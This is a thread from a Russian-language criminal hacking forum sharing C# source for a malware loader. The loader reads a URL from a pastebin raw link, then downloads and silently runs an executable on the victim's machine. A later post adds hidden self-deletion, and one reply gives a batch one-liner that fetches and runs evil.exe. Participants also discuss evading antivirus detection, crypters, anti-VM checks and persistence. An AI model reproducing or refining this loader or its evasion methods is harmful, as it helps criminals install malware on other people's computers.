• XSS.stack #1 – первый литературный журнал от юзеров форума

[Исходник C#] Примитивный лоадер через pastebin в 5кб.

Отслеживать
ViCode

ViCode

ripper
КИДАЛА
Регистрация
20.08.2019
Сообщения
413
Реакции
423
Пожалуйста, обратите внимание, что пользователь заблокирован
Увидел тему по соседству, ботнет на pastebin
Дай думаю попробую, простенький лоадер exe по ссылки размещенной на pastebin
Ссылка должна быть в raw формате прямая на ваш exe:
9e31ae2689.jpg


пароль на архив местный.

:smile11::smile11::smile11:
 

Вложения

  • pastebinload.zip
    3.3 КБ · Просмотры: 54
а понту паблик лоадер юзать, даже если клейка хорошая то сигнатура быстро по антивирям расходится.
стаким успехом можно и бантик лоадером сделать
CMD @ echo >> start iexplore.exe http://www.website.com/ival.exe >> evil.bat cmd.exe /c evil.bat

на выхлопе evil.exe лоадер
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну вообще суть такая что прикрутив автозагрузку можно менять ссылку на pastebin постоянно и грузить что то новое на те же машины.
Яж говорю :smile11:
 
лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов

а подмена файла evil.exe на сервере будет иметь тот же эфект.
 
Последнее редактирование:
ViCode сказал(а):
Он еще и фуд получился:

28b1bc439a.jpg
Щас после чека на этом сканере будет не фуд :smile4:

Интересно, есть сейчас в паблике малварь с блокчейн пу?
 
Последнее редактирование:
vmic сказал(а):
Щас после чека на этом сканере будет не фуд :smile4:
Месяц назад не сливал,х#й его знает кто пустил этот слух(либо я слишком везучий),чекнул уник стаб на этом сканнере был фуд,через неделю чекаю,детекты одни и теже.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
GayFox сказал(а):
криво написанный лодер
второй файл не скачает тк как уже есть l.exe
Криво код смотрел.
Он и не качает второй файл. Он переименовывает скачанный файл. А после запускает его.
Скрытый контент для зарегистрированных пользователей.

C#: 
using System;
using System.Diagnostics;
using System.Net;

namespace pastebinload
{
    class Program
    {
        public static string p = new WebClient().DownloadString(""); //ссылка на pastebin: raw
        public static string d = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + ("\\"); // Путь
        static void Main(string[] args)
        {
            using (var client = new WebClient())
            {
                try
                {
                    client.DownloadFile(p, d + "\\l.exe"); // Скачиваем и называем файл l.exe
                    Process proc = Process.Start(d + "\\l.exe"); //Запускаем l.exe
                }
                catch { }
            }
        }
    }
}
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
dev сказал(а):
лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов
Есть нерезидентные (скачал-запустил и все), а есть резидентные.Ес-но, большинство кодят первый вариант, ибо автолоад=палево=сложнее и т.д. А так, зависит какие задачи. Для говнолокеров достаточно нерезидента , для чего-то серьезного желательно все же не терять комп после ребута.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
VladIceCream сказал(а):
Месяц назад не сливал,х#й его знает кто пустил этот слух(либо я слишком везучий),чекнул уник стаб на этом сканнере был фуд,через неделю чекаю,детекты одни и теже.
Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
Ну и в довесок что мне не нравится это CDN, хз как оно, но ddos-guard.net так себе cdn/
 
Последнее редактирование:
dev сказал(а):
лоадер ведь не записывает себя в аутозагрузку? его задача быть не заметным т.е. не оставлять следов

C#: 
using System;
using System.Diagnostics;
using System.Net;
using System.Reflection;

namespace pastebinload
{
    class Program
    {
        public static string p = new WebClient().DownloadString(""); //ссылка на pastebin: raw
        public static string d = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + ("\\"); // Путь
        private static void Delet()
        {
            try
            {
                Process.Start(new ProcessStartInfo
                {
                    Arguments = "/C choice /C Y /N /D Y /T 3 & del \"" + 
                    new FileInfo(new Uri(Assembly.GetExecutingAssembly().CodeBase).LocalPath).Name + "\"",
                    WindowStyle = ProcessWindowStyle.Hidden,
                    CreateNoWindow = true,
                    FileName = "cmd.exe"
                }); //выполняет cmd команду на удаление с задежкой в 3сек
            }
            catch { }
        }
        static void Main(string[] args)
        {
            using (var client = new WebClient())
            {
                try
                {
                    client.DownloadFile(p, d + "\\l.exe"); // Скачиваем и называем файл l.exe
                    Process proc = Process.Start(d + "\\l.exe"); //Запускаем l.exe
                    Delet(); //после запуска удаляет сам себя
                }
                catch { }
            }
        }
    }
}
Не тестил, но у меня похожий код работает.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ViCode сказал(а):
Криво код смотрел.
Он и не качает второй файл. Он переименовывает скачанный файл. А после запускает его.
Скрытое содержимое
сорь я думал ты это все в цыкле.
 
ViCode сказал(а):
Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
Ну и в довесок что мне не нравится это CDN, хз как оно, но ddos-guard.net так себе cdn/
Ну,у меня подписка на криптор,мне лишь бы лоадер с антивм/дебаггером а криптую сам билд с мальварём я и так,раз в день
 
Пожалуйста, обратите внимание, что пользователь заблокирован
VladIceCream сказал(а):
Ну,у меня подписка на криптор,мне лишь бы лоадер с антивм/дебаггером а криптую сам билд с мальварём я и так,раз в день
В этом случае чекни мою тему - https://xss.pro/threads/33349/ :)
 
ViCode сказал(а):
Я с опаской его юзаю, т.к были прецеденты после чека на нем билда который не куда не сливал. Что оказалось странным, потом увидел еще гневные посты в продажниках от некоторых авторов малвари.
Бесплатный сыр только в мышеловке.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Koklush сказал(а):
В этом случае чекни мою тему - https://xss.pro/threads/33349/ :)
некрасиво так пиарится,если честно
 
Koklush сказал(а):
В этом случае чекни мою тему - https://xss.pro/threads/33349/ :)
Я имел ввиду лоадер который не палится и не боится как этот слива на вирус тотал,а тут перекриптовывать сам лоадер я не вижу смысла
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх